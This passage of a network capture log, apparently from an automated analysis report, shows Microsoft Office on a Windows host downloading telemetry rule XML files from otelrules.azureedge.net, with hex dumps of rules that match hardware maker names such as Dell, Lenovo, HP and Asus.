                                                                                                                                      ETag: "0x8DC582BB56D3AFB"
                                                                                                                                      x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221101Z-174f7845968qj8jrhC1EWRh41s00000010d000000000gavd
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:01 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      33192.168.2.44978413.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:01 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:01 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 2160
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                      ETag: "0x8DC582BA3B95D81"
                                                                                                                                      x-ms-request-id: 576a30ce-f01e-0052-7c0e-419224000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221101Z-174f7845968pght8hC1EWRyvxg00000003s0000000003s5u
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:01 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      34192.168.2.44978613.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:03 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 415
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                      ETag: "0x8DC582B9F6F3512"
                                                                                                                                      x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221103Z-174f7845968nxc96hC1EWRspw8000000108000000000d6tb
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:03 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      35192.168.2.44978513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:03 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 474
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                      ETag: "0x8DC582B9964B277"
                                                                                                                                      x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221103Z-174f7845968cpnpfhC1EWR3afc000000102000000000kxnk
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:03 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      36192.168.2.44978713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:03 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 471
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                      ETag: "0x8DC582BB10C598B"
                                                                                                                                      x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221103Z-174f7845968j6t2phC1EWRcfe800000010p000000000e31g
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:03 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      37192.168.2.44978813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:03 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 632
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                      ETag: "0x8DC582BB6E3779E"
                                                                                                                                      x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221103Z-174f7845968kdththC1EWRzvxn0000000cv000000000fhge
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:03 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      38192.168.2.44978913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:03 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 467
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                      ETag: "0x8DC582BA6C038BC"
                                                                                                                                      x-ms-request-id: 50b713a5-901e-0015-7a04-42b284000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221103Z-174f78459688l8rvhC1EWRtzr00000000d0g00000000ngd2
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:04 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      39192.168.2.44979113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:05 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:05 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 407
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                      ETag: "0x8DC582BBAD04B7B"
                                                                                                                                      x-ms-request-id: e2bedc78-c01e-0066-2f35-40a1ec000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221105Z-174f7845968nxc96hC1EWRspw800000010c0000000001wtd
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:05 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      40192.168.2.44979413.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:05 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:05 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 486
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                      ETag: "0x8DC582B9018290B"
                                                                                                                                      x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221105Z-174f7845968cdxdrhC1EWRg0en00000010bg00000000pm62
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:05 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      41192.168.2.44979213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:05 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:05 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 486
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                      ETag: "0x8DC582BB344914B"
                                                                                                                                      x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221105Z-174f78459685m244hC1EWRgp2c00000010eg00000000346k
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:05 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      42192.168.2.44979313.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:05 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:05 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 427
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                      ETag: "0x8DC582BA310DA18"
                                                                                                                                      x-ms-request-id: cce54a11-701e-006f-7509-42afc4000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221105Z-174f7845968glpgnhC1EWR7uec00000010kg00000000r09q
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
